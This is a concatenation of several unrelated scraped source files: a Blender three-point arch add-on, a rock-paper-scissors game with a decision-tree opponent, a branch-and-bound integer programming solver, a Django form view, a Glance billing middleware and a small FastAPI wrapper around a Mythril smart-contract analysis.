    #axis_lk = rot_dat.axis_lk
    mov_aligned = mov_co - piv_co
    rot_val = []
    if axis_lk == '': # arbitrary axis / spherical rotations
        rot_val = Quaternion(rot_dat.piv_norm, ang_diff_rad)
    elif axis_lk == 'X':
        rot_val = Euler((ang_diff_rad, 0.0, 0.0), 'XYZ')
    elif axis_lk == 'Y':
        rot_val = Euler((0.0, ang_diff_rad, 0.0), 'XYZ')
    elif axis_lk == 'Z':
        rot_val = Euler((0.0, 0.0, ang_diff_rad), 'XYZ')
    mov_aligned.rotate(rot_val)
    return mov_aligned + piv_co
def draw_pt_2D(pt_co, pt_color):
    """Draw a single 10px point at 2D region coordinates pt_co using the
    legacy bgl immediate-mode API."""
    bgl.glEnable(bgl.GL_BLEND)
    bgl.glPointSize(10)
    bgl.glColor4f(*pt_color)
    bgl.glBegin(bgl.GL_POINTS)
    bgl.glVertex2f(*pt_co)
    bgl.glEnd()
    return
def draw_line_2D(pt_co_1, pt_co_2, pt_color):
    """Draw a line segment between two 2D region coordinates using the
    legacy bgl immediate-mode API."""
    bgl.glEnable(bgl.GL_BLEND)
    bgl.glPointSize(7)
    bgl.glColor4f(*pt_color)
    bgl.glBegin(bgl.GL_LINE_STRIP)
    bgl.glVertex2f(*pt_co_1)
    bgl.glVertex2f(*pt_co_2)
    bgl.glEnd()
    return
def draw_circ_seg_3D(steps, pts, orig, ang_meas, rot_dat, pt_color):
    """Preview the arch: draw a circular arc of `ang_meas` radians around
    centre `orig`, projected from 3D into the active 2D region.

    pts[0] is the arc's start point, pts[1] its end point; `steps` controls
    how many straight segments approximate the curve.
    """
    global reg_rv3d
    orig2d = loc_3d_to_2d(reg_rv3d[0], reg_rv3d[1], orig)
    # todo figure out why above sometimes returns None in Perspective mode...
    # returns None when 3d point is not inside active 3D View
    if orig2d is not None:
        draw_pt_2D(orig2d, Colr.white)
    rad_incr = abs(ang_meas / steps)
    bgl.glColor4f(*pt_color)
    bgl.glBegin(bgl.GL_LINE_STRIP)
    curr_ang = 0.0
    while curr_ang <= ang_meas:
        # rotate the start point stepwise around the centre, project, plot
        new_pt = get_rotated_pt(orig, pts[0], curr_ang, rot_dat)
        new_pt2d = loc_3d_to_2d(reg_rv3d[0], reg_rv3d[1], new_pt)
        if new_pt2d is not None:
            bgl.glVertex2f(new_pt2d[X], new_pt2d[Y])
        curr_ang = curr_ang + rad_incr
    # close the strip on the exact end point
    new_pt2d = loc_3d_to_2d(reg_rv3d[0], reg_rv3d[1], pts[1])
    if new_pt2d is not None:
        bgl.glVertex2f(new_pt2d[X], new_pt2d[Y])
    bgl.glEnd()
    return
# Refreshes mesh drawing in 3D view and updates mesh coordinate
# data so ref_pts are drawn at correct locations.
# Using editmode_toggle to do this seems hackish, but editmode_toggle seems
# to be the only thing that updates both drawing and coordinate info.
def editmode_refresh(ed_type):
    """Force a redraw/coordinate refresh by toggling edit mode twice (no-op
    outside EDIT_MESH)."""
    if ed_type == "EDIT_MESH":
        bpy.ops.object.editmode_toggle()
        bpy.ops.object.editmode_toggle()
# === PointFind code ===
def create_snap_pt(msLoc, EdType):
global reg_rv3d, pt_store
#sel_backup.update(EdType)
region, rv3d = reg_rv3d[0], reg_rv3d[1]
v_u = view3d_utils # shorthand
perspMdFix = v_u.region_2d_to_vector_3d(region, rv3d, msLoc) / 5
enterloc = v_u.region_2d_to_origin_3d(region, rv3d, msLoc) + perspMdFix
if EdType == 'OBJECT':
bpy.ops.object.add(type = 'MESH', location = enterloc)
pt_store = bpy.context.object
# todo : move below to backup_snap_settings ?
bpy.context.tool_settings.use_snap = False
bpy.context.tool_settings.snap_element = 'VERTEX'
#bpy.context.tool_settings.snap_target = 'ACTIVE'
bpy.ops.transform.translate('INVOKE_DEFAULT')
# Makes sure only the "guide point" object or vert
# added with create_snap_pt is grabbed.
def grab_snap_pt(ms_loc, ed_type, sel_backup):
    """Re-select only the guide point object and re-enter interactive grab.

    NOTE(review): the EDIT_MESH branch is disabled (stringified-out below);
    only the object-mode path is live.
    """
    global reg_rv3d, pt_store
    #sel_backup.update(ed_type)
    region, rv3d = reg_rv3d[0], reg_rv3d[1]
    v_u = view3d_utils # shorthand
    persp_md_fix = v_u.region_2d_to_vector_3d(region, rv3d, ms_loc) / 5
    enterloc = v_u.region_2d_to_origin_3d(region, rv3d, ms_loc) + persp_md_fix
    #if ed_type == 'OBJECT':
    bpy.ops.object.select_all(action='DESELECT')
    bpy.context.scene.objects[0].select = True
    # #bpy.context.scene.objects[0].location = enterloc
    '''
    elif ed_type == 'EDIT_MESH':
        bpy.ops.mesh.select_all(action='DESELECT')
        bm = bmesh.from_edit_mesh(bpy.context.edit_object.data)
        bm.verts[-1].select = True
        inver_mw = bpy.context.edit_object.matrix_world.inverted()
        local_co = inver_mw * enterloc
        #bm.verts[-1].co = local_co
        editmode_refresh(ed_type)
    '''
    bpy.ops.transform.translate('INVOKE_DEFAULT')
# Makes sure only the "guide point" object or vert
# added with create_snap_pt is deleted.
def remove_snap_pt(ed_type, sel_backup):
    """Delete the guide point (object in OBJECT mode, last vert in EDIT_MESH)
    without disturbing the rest of the selection state."""
    if ed_type == 'OBJECT':
        bpy.ops.object.select_all(action='DESELECT')
        bpy.context.scene.objects[0].select = True
        bpy.ops.object.delete()
    elif ed_type == 'EDIT_MESH':
        bpy.ops.mesh.select_all(action='DESELECT')
        bm = bmesh.from_edit_mesh(bpy.context.edit_object.data)
        bm.verts[-1].select = True
        editmode_refresh(ed_type)
        bpy.ops.mesh.delete(type='VERT')
    #sel_backup.restore_selected(ed_type)
    #print("removsadf")
def step_decrm(self):
    """Decrease the arch segment count by one, keeping at least 2 segments."""
    if self.step_cnt >= 3:
        self.step_cnt -= 1
def exit_addon(self):
    """Clean up on add-on exit: delete the guide point if it still exists
    (pt_cnt < 5 means the final extrude stage was not reached), leave edit
    mode, and restore the user's snap settings."""
    if self.pt_cnt < 5:
        remove_snap_pt(self.curr_ed_type, self.sel_backup)
    '''
    #if self.pt_find_md == XO_GRABONLY:
    remove_snap_pt(self.curr_ed_type, self.sel_backup)
    self.pt_find_md = XO_SLOW3DTO2D
    if self.curr_ed_type == 'EDIT_MESH':
        for i in self.sel_backup.sel_msh_objs:
            self.sel_backup.obj[i].select = True
        for i in self.sel_backup.sel_nm_objs:
            self.sel_backup.obj[i].select = True
    '''
    if self.curr_ed_type == 'EDIT_MESH':
        bpy.ops.object.editmode_toggle()
    restore_snap_settings(self.settings_backup)
    #print("\n\n\n Add-On Exited!\n") # debug
def draw_callback_px(self, context):
    """Per-frame draw callback driving the arch tool's state machine.

    On a left click it advances through the stages (collect 3 points, spin
    the first arch edge, extrude/scale to faces, extrude to a solid); every
    frame it draws the 2D preview of the points and the candidate arc.
    Stage is tracked in self.pt_cnt; self.buff caches the chosen arc as
    (side, (start, end), centre, angle).
    """
    getreg_rv3d()
    stp_cnt = self.step_cnt
    global pt_store, reg_rv3d
    if self.left_click:
        self.left_click = False
        t_loc = None
        if self.pt_cnt < 3:
            t_loc = pt_store.location.copy()
        if t_loc != None:
            # ignore clicks that duplicate an already-placed point
            dup = False
            for i in self.pts:
                if t_loc == i:
                    dup = True
            if dup == False:
                self.pts.append( t_loc.copy() )
                self.pt_cnt += 1
                if self.pt_cnt < 2:
                    bpy.ops.transform.translate('INVOKE_DEFAULT')
                elif self.pt_cnt == 2:
                    # move snap point to arch center before turning grab mode back on
                    bpy.context.scene.objects[0].location = self.pts[0].lerp(self.pts[1], 0.5)
                    bpy.ops.transform.translate('INVOKE_DEFAULT')
        elif self.pt_cnt == 3 and self.buff != None:
            # stage 3 -> 4: build the first arch edge by spinning a vertex
            self.pt_cnt += 1
            bpy.context.scene.objects[0].location = self.buff[2].copy()
            #if self.curr_ed_type != 'EDIT_MESH':
            #    bpy.ops.object.editmode_toggle()
            bpy.ops.object.editmode_toggle()
            inv_mw = bpy.context.scene.objects[0].matrix_world.inverted()
            piv_cent = inv_mw * self.buff[2]
            bm = bmesh.from_edit_mesh(bpy.context.edit_object.data)
            bm.verts.new( inv_mw * self.buff[1][0] )
            # Spin and deal with geometry on side 'a'
            edges_start_a = bm.edges[:]
            geom_start_a = bm.verts[:] + edges_start_a
            ret = bmesh.ops.spin(
                bm,
                geom=geom_start_a,
                angle=self.buff[3],
                steps=stp_cnt,
                axis=self.rdat.piv_norm,
                cent=piv_cent)
            edges_end_a = [ele for ele in ret["geom_last"]
                if isinstance(ele, bmesh.types.BMEdge)]
            del ret
            # set pivot/snap so the follow-up scale happens around the arc centre
            bpy.context.scene.cursor_location = self.buff[2].copy()
            bpy.context.tool_settings.snap_target = 'ACTIVE'
            bpy.context.space_data.pivot_point = 'CURSOR'
            bpy.context.space_data.transform_orientation = 'GLOBAL'
            bpy.ops.mesh.select_all(action='SELECT')
            bpy.ops.mesh.extrude_region_move()
            bpy.ops.transform.resize('INVOKE_DEFAULT', constraint_orientation = 'GLOBAL')
        elif self.pt_cnt == 4:
            # stage 4 -> 5: extrude the arch faces into a solid, then exit
            self.pt_cnt += 1
            if self.buff != None:
                bpy.ops.mesh.select_all(action='SELECT')
                bpy.ops.view3d.edit_mesh_extrude_move_normal('INVOKE_DEFAULT')
                self.exitCheck = True
    #print("self.pt_cnt", self.pt_cnt) # debug
    # Draw UI: setup 2d data for drawing on screen
    pts2d, pts_str2d = [], []
    if self.pt_cnt > 0:
        pts2d = [loc_3d_to_2d(reg_rv3d[0], reg_rv3d[1], i) for i in self.pts]
        pts_str2d = loc_3d_to_2d(reg_rv3d[0], reg_rv3d[1], pt_store.location)
    if self.pt_cnt == 1:
        # rubber-band line from the first point to the guide point
        draw_line_2D(pts2d[0], pts_str2d, Colr.white)
    elif self.pt_cnt == 2:
        # two width points placed: derive the arc through both plus the
        # guide point (which sets the arch height) and preview it
        cent = self.pts[0].lerp(self.pts[1], 0.5)
        self.rdat.piv_norm = geometry.normal(self.pts[0], cent, pt_store.location)
        pivNorm = self.rdat.piv_norm.copy()
        movAligned = self.pts[0] - cent
        rot_pos, rot_neg = movAligned.copy(), movAligned.copy()
        hgt = (pt_store.location - cent).length
        wid = (self.pts[0] - self.pts[1]).length
        rad = None
        if hgt != 0:
            # circle radius from chord width and sagitta height
            rad = (hgt / 2) + (wid * wid) / (8 * hgt)
        else:
            rad = 0
        cen_to_piv = rad - hgt
        # find points perp to starting two
        rot_pos.rotate( Quaternion(pivNorm, radians(90)) )
        rot_neg.rotate( Quaternion(pivNorm,-radians(90)) )
        rot_pos = rot_pos + cent
        rot_neg = rot_neg + cent
        old_dis = wid / 2
        scale = cen_to_piv / old_dis
        circ_cen_p = cent.lerp(rot_pos, scale)
        circ_cen_n = cent.lerp(rot_neg, scale)
        # workaround to avoid division by zero
        algnAco = self.pts[0] - circ_cen_p
        algnCco = self.pts[1] - circ_cen_p
        ang_meas = algnAco.angle(algnCco)
        if ang_meas == 0.0:
            self.buff = None
            draw_line_2D(pts2d[0], pts2d[1], Colr.white)
            return
        if rad > wid/2 and hgt > rad:
            # arch taller than a semicircle: take the reflex angle
            ang_meas = 2 * pi - ang_meas
        rot_pos_2d = loc_3d_to_2d(reg_rv3d[0], reg_rv3d[1], rot_pos)
        rot_neg_2d = loc_3d_to_2d(reg_rv3d[0], reg_rv3d[1], rot_neg)
        msToPtP_dis = (rot_pos_2d - pts_str2d).length
        msToPtN_dis = (rot_neg_2d - pts_str2d).length
        if msToPtP_dis > msToPtN_dis: # closer to negative
            new_pts = self.pts[1], self.pts[0]
            draw_circ_seg_3D(stp_cnt, new_pts, circ_cen_p, ang_meas, self.rdat, Colr.green)
            self.buff = 'neg', new_pts, circ_cen_p, ang_meas
        elif msToPtP_dis < msToPtN_dis: # closer to positive
            draw_circ_seg_3D(stp_cnt, self.pts, circ_cen_n, ang_meas, self.rdat, Colr.green)
            self.buff = 'pos', self.pts, circ_cen_n, ang_meas
    elif self.pt_cnt == 3:
        # arc locked in: keep drawing the chosen preview
        if self.buff == None:
            pts2d = [loc_3d_to_2d(reg_rv3d[0], reg_rv3d[1], i) for i in self.pts]
            draw_line_2D(pts2d[0], pts2d[1], Colr.white)
        else:
            draw_circ_seg_3D(stp_cnt, self.buff[1], self.buff[2], self.buff[3], self.rdat, Colr.green)
    for i in pts2d:
        draw_pt_2D(i, Colr.white)
class ModalArchTool(bpy.types.Operator):
    '''Modal operator implementing the three point arch tool'''
    bl_idname = "view3d.modal_arch_tool"
    bl_label = "Three Point Arch Tool"
    # Only launch Add-On from OBJECT or EDIT modes
    @classmethod
    def poll(self, context):
        return context.mode == 'OBJECT' or context.mode == 'EDIT_MESH'
    def modal(self, context, event):
        """Event loop: records clicks / step-count changes for the draw
        callback and handles cancel/finish transitions."""
        context.area.tag_redraw()
        self.curr_ed_type = context.mode
        # let navigation events through to the viewport
        if event.type in {'MIDDLEMOUSE', 'NUMPAD_1', 'NUMPAD_2', 'NUMPAD_3',
        'NUMPAD_4', 'NUMPAD_6', 'NUMPAD_7', 'NUMPAD_8', 'NUMPAD_9', 'NUMPAD_5'}:
            return {'PASS_THROUGH'}
        if event.type == 'MOUSEMOVE':
            self.mouse_loc = Vector((event.mouse_region_x, event.mouse_region_y))
        # left click or spacebar confirms the current stage
        if event.type == 'LEFTMOUSE' and event.value == 'RELEASE':
            self.left_click = True
            self.left_click_loc = Vector((event.mouse_region_x, event.mouse_region_y))
        if event.type == 'SPACE' and event.value == 'RELEASE':
            self.left_click = True
            self.left_click_loc = Vector((event.mouse_region_x, event.mouse_region_y))
        # while previewing the arc, wheel/arrows adjust segment count
        if self.pt_cnt == 3:
            if event.type == 'WHEELUPMOUSE':
                self.step_cnt += 1
            if event.type == 'WHEELDOWNMOUSE':
                step_decrm(self)
            if event.type == 'UP_ARROW' and event.value == 'RELEASE':
                self.step_cnt += 1
            if event.type == 'DOWN_ARROW' and event.value == 'RELEASE':
                step_decrm(self)
        #if event.type == 'D' and event.value == 'RELEASE':
        #    # call debugger
        #    __import__('code').interact(local=dict(globals(), **locals()))
        if event.type in {'ESC', 'RIGHTMOUSE'}:
            bpy.types.SpaceView3D.draw_handler_remove(self._handle, 'WINDOW')
            exit_addon(self)
            return {'CANCELLED'}
        if self.exitCheck:
            bpy.types.SpaceView3D.draw_handler_remove(self._handle, 'WINDOW')
            exit_addon(self)
            return {'FINISHED'}
        return {'RUNNING_MODAL'}
    def invoke(self, context, event):
        """Install the draw callback, initialize the tool state and create
        the snap/guide point under the mouse."""
        if context.area.type == 'VIEW_3D':
            args = (self, context)
            # Add the region OpenGL drawing callback
            # draw in view space with 'POST_VIEW' and 'PRE_VIEW'
            self._handle = bpy.types.SpaceView3D.draw_handler_add(draw_callback_px,
                args, 'WINDOW', 'POST_PIXEL')
            if context.mode == 'EDIT_MESH':
                bpy.ops.object.editmode_toggle()
            bpy.ops.object.select_all(action='DESELECT')
            self.curr_ed_type = context.mode # current Blender Editor Type
            self.mouse_loc = Vector((event.mouse_region_x, event.mouse_region_y))
            self.left_click_loc = []
            self.left_click = False
            self.rdat = RotationData('')
            self.step_cnt = 8   # arch segments; adjustable with wheel/arrows
            self.pt_cnt = 0     # stage counter (see module docstring)
            self.pts = []       # the placed 3D points
            self.buff = None    # chosen arc: (side, (start, end), centre, angle)
            self.settings_backup = backup_snap_settings()
            self.sel_backup = None # place holder
            self.exitCheck = False
            context.window_manager.modal_handler_add(self)
            getreg_rv3d()
            create_snap_pt(self.mouse_loc, self.curr_ed_type)
            #print("Add-on started!")
            return {'RUNNING_MODAL'}
        else:
            self.report({'WARNING'}, "View3D not found, cannot run operator")
            return {'CANCELLED'}
def register():
    """Register the operator with Blender (called when the add-on is enabled)."""
    bpy.utils.register_class(ModalArchTool)
def unregister():
    """Unregister the operator from Blender (called when the add-on is disabled)."""
    bpy.utils.unregister_class(ModalArchTool)
if __name__ == "__main__":
register()
| JT-a/blenderpython279 | scripts/addons_extern/tp_arch_tool_v000.py | tp_arch_tool_v000.py | py | 18,451 | python | en | code | 5 | github-code | 50 |
45730463859 | from __future__ import division, print_function
from sklearn import preprocessing
from sklearn.tree import DecisionTreeClassifier, export_graphviz
from sklearn.externals.six import StringIO
import numpy as np
import random
import json
# Takes a dictionary of players as keys and weapons as values
# Returns the key of the winning player
def winner(game):
    """Return the lowercased key of the winning player in *game* (a mapping
    of player name -> weapon), or 'draw' when both weapons tie."""
    beats = {frozenset(['paper', 'rock']): 'paper',
             frozenset(['rock', 'scissors']): 'rock',
             frozenset(['scissors', 'paper']): 'scissors'}
    played = frozenset([game['Human'], game['Computer']])
    winning_weapon = beats.get(played, 'draw')
    if winning_weapon == 'draw':
        return 'draw'
    for name, weapon in game.items():
        if weapon == winning_weapon:
            return name.lower()
# Returns the choice entered at the command line
def human_choice():
    """Prompt on stdin until the user types a valid weapon; return it.

    NOTE: uses `raw_input`, so this module targets Python 2.
    """
    valid_options = frozenset(['rock', 'paper', 'scissors'])
    while True:
        # Normalize: lowercase and strip surrounding whitespace.
        user_input = raw_input('Please enter your choice: rock, paper, scissors: ').lower().strip()
        if user_input in valid_options:
            return user_input
        else:
            print('Entry not valid.')
# Returns a random weapon
def random_choice():
    """Play a uniformly random weapon (logs which strategy ran)."""
    print('playing random')
    weapons = ['rock', 'paper', 'scissors']
    return random.choice(weapons)
# Returns weapon based on http://www.businessinsider.com/how-to-beat-anyone-at-rock-paper-scissors-2014-5
def wang_choice(last_game):
    """Counter-strategy from the Business Insider article referenced above:
    winners tend to repeat their weapon, losers tend to switch.

    Returns the weapon that beats the human's predicted next move, or a
    random weapon when there is no history yet (last_game['Human'] is None).
    """
    human_won = {'rock': 'paper', 'paper': 'scissors', 'scissors': 'rock'}
    human_lost = {'rock': 'scissors', 'paper': 'rock', 'scissors': 'paper'}
    if last_game['Champion'] == 'human':
        return human_won[last_game['Human']]
    # BUG FIX: the original used human_lost.get(key, random_choice()), which
    # eagerly evaluated random_choice() on *every* non-human-win call —
    # printing 'playing random' and consuming RNG state even when the lookup
    # succeeded. Only fall back to random when there is truly no history.
    if last_game['Human'] in human_lost:
        return human_lost[last_game['Human']]
    return random_choice()
# Returns choice based on decision tree
def tree_choice(last_game):
    """Pick a counter-weapon by predicting the human's next move with a
    decision tree trained on the saved game history in ./data.

    Falls back to wang_choice until two full rounds of history exist
    (i.e. while any value in last_game is still None).
    """
    # Maps a predicted human weapon to the weapon that beats it.
    offensive_definitions = {'rock': 'paper', 'paper': 'scissors', 'scissors': 'rock'}
    # for/else: null_found ends up False only when no value is None.
    for value in last_game.values():
        if value == None:
            null_found = True
            break
    else:
        null_found = False
    if null_found:
        print('found null - playing wang')
        return wang_choice(last_game)
    else:
        print('playing tree')
        # Encode weapons and champions as integers for sklearn.
        weapons_encoder = preprocessing.LabelEncoder()
        weapons_encoder.fit(['paper', 'rock', 'scissors'])
        champion_encoder = preprocessing.LabelEncoder()
        champion_encoder.fit(['computer', 'human', 'draw'])
        samples = []
        labels = []
        #get data
        with open('data', 'r') as f:
            for line in f.readlines():
                # preprocess data
                game = json.loads(line)
                del game['Game']
                del game['Computer']
                del game['Champion']
                human_older = weapons_encoder.transform([game['Human_Older']])
                computer_older = weapons_encoder.transform([game['Computer_Older']])
                champion_older = champion_encoder.transform([game['Champion_Older']])
                # NOTE(review): '+' on these encoded arrays is elementwise
                # addition, collapsing three features into one number —
                # concatenation may have been intended; confirm.
                sample = human_older + computer_older + champion_older
                samples.append(sample)
                labels.append(weapons_encoder.transform([game['Human']]))
        # train the model with the data
        tree = DecisionTreeClassifier()
        tree = tree.fit(samples, labels)
        # print tree
        with open('tree.dot', 'w') as f:
            f = export_graphviz(tree, out_file=f)
        # predict and return the next choice
        # NOTE(review): transform() is given bare strings here (not lists),
        # and predict() receives `labels` as its second argument — both look
        # accidental; verify against the scikit-learn API before changing.
        human = weapons_encoder.transform(last_game['Human'])
        computer = weapons_encoder.transform(last_game['Computer'])
        champion = champion_encoder.transform(last_game['Champion'])
        test_data = [human + computer + champion]
        test_data = np.array(test_data).reshape(1, -1)
        prediction = tree.predict(test_data, labels)
        prediction = weapons_encoder.inverse_transform(prediction)
        return offensive_definitions[prediction[0]]
# Returns game selection
def game_type():
    """Prompt until the user picks a computer strategy; return it lowercased.

    NOTE: uses `raw_input`, so this module targets Python 2.
    """
    valid_options = frozenset(['random', 'wang', 'tree'])
    while True:
        user_input = raw_input('Please enter your choice of game: Random, Wang, or Tree: ').lower().strip()
        if user_input in valid_options:
            return user_input
        else:
            print('Entry not valid.')
# Create and store a new data record
def process_results(game, last_game):
    """Shift the game history one round back and merge in the round just
    played, mutating and returning *last_game*.

    The record is appended (as one JSON line) to the 'data' file only when
    it is complete — i.e. contains two full rounds of history — since the
    decision-tree trainer needs the *_Older fields populated.
    """
    # create a new last_game: current round becomes history, new round is merged
    last_game['Game_Older'] = last_game['Game']
    last_game['Game'] = game['Game']
    last_game['Computer_Older'] = last_game['Computer']
    last_game['Computer'] = game['Computer']
    last_game['Human_Older'] = last_game['Human']
    last_game['Human'] = game['Human']
    last_game['Champion_Older'] = last_game['Champion']
    last_game['Champion'] = game['Champion']
    # store the new last_game, but only complete records (no None values);
    # replaces the original for/else flag and `== None` comparisons.
    if all(value is not None for value in last_game.values()):
        with open('data', 'a') as f:
            f.write(json.dumps(last_game) + '\n')
    # return the new last_game
    return last_game
# Runs the main program
def main():
    """Interactive game loop: pick a computer strategy once, then play
    rounds until the user declines to continue, tracking the human's
    win rate over non-draw games."""
    # Initialize the game
    total_games = 0
    human_wins = 0
    # Two rounds of history, all None until real games are played.
    last_game = {'Game': None, 'Computer': None, 'Human': None, 'Champion': None,
                 'Game_Older': None, 'Computer_Older': None, 'Human_Older': None, 'Champion_Older': None}
    # Play the game
    g_t = game_type()
    more = True
    while more:
        print('\nOld last_game: ', end='')
        print(last_game)
        # Computer commits to its weapon before seeing the human's choice.
        if g_t == 'random':
            game = {'Game': 'random'}
            game['Computer'] = random_choice()
        elif g_t == 'wang':
            game = {'Game': 'wang'}
            game['Computer'] = wang_choice(last_game)
        elif g_t == 'tree':
            game = {'Game': 'tree'}
            game['Computer'] = tree_choice(last_game)
        else:
            print('Game Type Error - Tell Daniel')
            break
        game['Human'] = human_choice()
        game['Champion'] = winner(game)
        print('Current game: ', end='')
        print(game)
        # Process the data and create a new last game
        last_game = process_results(game, last_game)
        print('New last_game: ', end='')
        print(last_game)
        # Report on the game (draws are excluded from the win-rate stats)
        if game['Champion'] != 'draw':
            total_games += 1
            if game['Champion'] == 'human':
                human_wins += 1
            print('\n' + game['Champion'] + ' wins!')
            print('Human Win Rate: {0:.0f}%'.format(human_wins/total_games * 100))
            print('Total Game: ', end='')
            print(total_games)
        else:
            print('\nDraw')
        # Ask if humans want to go again
        if raw_input('\nContinue? n = no, anything else = yes: ') == 'n':
            more = False
if __name__ == '__main__':
main() | daniel-lovell/Paper-Rock-Scissors | rps.py | rps.py | py | 6,914 | python | en | code | 0 | github-code | 50 |
70551213276 | from Simplex import *
class BranchAndBound:
    """Integer-programming solver: branch-and-bound on top of the Simplex
    solver, branching on the first fractional component of each LP solution.

    Best integer solutions/values found so far are accumulated in
    self.Solutions / self.Values; branching points in self.Nodes.
    """
    def __init__(self, a, b, c, minimize=True):
        # self.BaseA = a
        # self.BaseB = b
        self.A = a                  # constraint matrix
        self.B = b                  # constraint right-hand sides
        self.C = c                  # objective coefficients
        self.Minimize = minimize    # True = minimize, False = maximize
        self.Solutions = []         # integer-feasible solutions found
        self.Values = []            # objective values of those solutions
        self.Nodes = []             # fractional values branched on
        self.Count = 0              # branching depth counter (for logging)
    def find_float(self, solution):
        """Index of the first non-integer component, or len(solution) if all
        components are integral (the caller uses that as the 'done' signal)."""
        for i in range(len(solution)):
            if solution[i] != 0 and solution[i] % 1 != 0:
                return i
        return len(solution)
    def calculate(self, a, b):
        """Solve the LP relaxation for (a, b); record an integral solution or
        branch recursively on the first fractional variable.

        NOTE(review): the recursive calls build the child systems from
        self.A / self.B rather than the a / b passed in, so constraints do
        not accumulate down the tree — confirm whether that is intended.
        """
        simp = Simplex(a, b, self.C, self.Minimize)
        simp.calculate()
        simp.print_info()
        if not simp.solution_exists():
            print('\nSOLUTION DOES NOT EXIST\n')
            return
        # Prune: the relaxation cannot beat the best integral value found.
        # NOTE(review): the message below prints max(self.Values) in both
        # branches; the minimize branch presumably meant min(self.Values).
        if len(self.Values) != 0 and ((self.Minimize and simp.find_func_value() > min(self.Values)) or
                                      (not self.Minimize and simp.find_func_value() < max(self.Values))):
            print(f'Value {simp.find_func_value()} '
                  f'{"is more than minimal" if self.Minimize else "is less than maximal"} {max(self.Values)}\n')
            return
        k = self.find_float(simp.Solution)
        # NOTE(review): the bare except silently swallows any error raised
        # while recording/printing the solution — consider narrowing it.
        try:
            if k == len(simp.Solution):
                # Fully integral solution: keep it if it improves the incumbent.
                if len(self.Values) == 0 or (self.Minimize and simp.find_func_value() < min(self.Values)) or \
                        (not self.Minimize and simp.find_func_value() > max(self.Values)):
                    self.Values.append(simp.find_func_value())
                    self.Solutions.append(simp.Solution)
                print(f'Solutions: {self.Solutions}')
                print(f'Values: {self.Values}')
                print(f'Minimal: {min(self.Values)}') if self.Minimize else print(f'Maximal: {max(self.Values)}')
                print(f'Nodes: {self.Nodes}\n')
                return
        except:
            return
        self.Count += 1
        print(f'{self.Count} LEVEL\n')
        node = round(simp.Solution[k], 2)
        print(f'Branching by {node} on x <= {node // 1} and x >= {node // 1 + 1}\n')
        self.Nodes.append(node)
        # Branch 1: x_k <= floor(node). Constraint sign depends on whether the
        # Simplex formulation negates <= rows for minimization.
        print(f'Add x{k+1} <= {node // 1}\n')
        new_lhs = np.zeros(self.A.shape[1])
        new_lhs[k] = 1 if not self.Minimize else -1
        self.calculate(a=np.vstack([self.A, new_lhs]), b=np.append(self.B, node//1 if not self.Minimize else -node//1))
        # Branch 2: x_k >= floor(node) + 1.
        print(f'Add x{k + 1} >= {node // 1 + 1}\n')
        new_lhs = np.zeros(self.A.shape[1])
        new_lhs[k] = -1 if not self.Minimize else 1
        self.calculate(a=np.vstack([self.A, new_lhs]), b=np.append(self.B,
                                                                   -(node//1+1) if not self.Minimize else node//1+1))
| TheMatrix2/OptimizationMethods | Branch&BoundMethod/BranchAndBound.py | BranchAndBound.py | py | 2,746 | python | en | code | 0 | github-code | 50 |
8141213629 | import sqlite3
from django.shortcuts import render, redirect, reverse
from django.contrib.auth.decorators import login_required
from capstoneapp.models import Business, BusinessType, Customer
from .business_details import get_business
def get_business_types():
    """Return a queryset of every BusinessType (used to fill form dropdowns)."""
    return BusinessType.objects.all()
@login_required
def business_form(request):
    """GET: render the empty "add business" form with every business type
    for the type dropdown. Other methods fall through and return None."""
    if request.method == 'GET':
        # """GETS a list of all business types to populate the dropdown in the add business form."""
        business_types = get_business_types()
        template = 'businesses/business_form.html'
        context = {
            'all_business_types': business_types
        }
        return render(request, template, context)
@login_required
def business_edit_form(request, business_id):
    """GET: render the business form pre-filled with one business's details
    so it can be edited. Other methods fall through and return None, matching
    the sibling `business_form` view."""
    if request.method == 'GET':
        # """GETS the details of a specific business to pre-fill the business edit form."""
        business = get_business(business_id)
        # BUG FIX: the original assigned the function object itself
        # (`get_business_types` with no parentheses), unlike business_form
        # which calls it — the template relied on Django invoking the
        # callable during rendering. Call it explicitly for consistency.
        business_types = get_business_types()
        template = 'businesses/business_form.html'
        context = {
            'business': business,
            'all_business_types': business_types
        }
        return render(request, template, context)
| castlesmadeofcode/Stay-Safr | capstoneapp/views/businesses/business_form.py | business_form.py | py | 1,202 | python | en | code | 0 | github-code | 50 |
19594321641 | import re
from gringotts.middleware import base
UUID_RE = r"([0-9a-f]{32}|[0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12})"
API_VERSION = r"(v1|v2)"
RESOURCE_RE = r"(images)"
class GlanceBillingProtocol(base.BillingProtocol):
    """Billing middleware specialized for the Glance (images) API: supplies
    the URL patterns the base protocol uses to recognize billable requests."""
    def __init__(self, app, conf):
        super(GlanceBillingProtocol, self).__init__(app, conf)
        # Matches /v1|v2/images/<uuid>[.ext] — a single image resource.
        self.resource_regex = re.compile(
            r"^/%s/%s/%s([.][^.]+)?$" % (API_VERSION, RESOURCE_RE, UUID_RE), re.UNICODE)
        # Matches /v1|v2/images[.ext] — the collection (creation) endpoint.
        self.create_resource_regex = re.compile(
            r"^/%s/%s([.][^.]+)?$" % (API_VERSION, RESOURCE_RE), re.UNICODE)
        # Presumably the path-segment index of the resource id — confirm
        # against base.BillingProtocol before relying on this.
        self.position = 2
        self.resource_regexs = [
            self.resource_regex,
        ]
def filter_factory(global_conf, **local_conf):
    """Paste-deploy filter factory: merge the global and local settings
    (local values win) and return a callable that wraps an app in the
    Glance billing middleware."""
    merged = dict(global_conf)
    merged.update(local_conf)
    def bill_filter(app):
        return GlanceBillingProtocol(app, merged)
    return bill_filter
| gbraad/ustack-gringotts | gringotts/middleware/glance.py | glance.py | py | 906 | python | en | code | null | github-code | 50 |
17313809663 | from fastapi import FastAPI
from mythril_script import *
import json
app = FastAPI()
@app.get('/')
def default():
    # Health-check endpoint: confirms the API server is up.
    return "Server is running! The API is ready"
@app.get("/output/{contract_name}")
async def show(contract_name: str):
    """Run the Mythril analysis for *contract_name* and return its issues.

    The analyzer writes a JSON report under ./json/, named after the
    contract with the .sol extension swapped for .json.
    """
    analyze_mythril(contract_name)
    file_json = contract_name.replace(".sol", ".json")
    path_json_final = "./json/" + file_json
    # BUG FIX: the original leaked the open file handle and only *printed*
    # the issues, so the HTTP response body was null. Read the report with
    # a context manager and return the issues to the client.
    with open(path_json_final, 'r') as json_file:
        obj = json.load(json_file)
    print(str(obj['issues']))
    return str(obj['issues'])
41099265715 | ###########################################
# Book "Python Crash course" - Eric Matthes
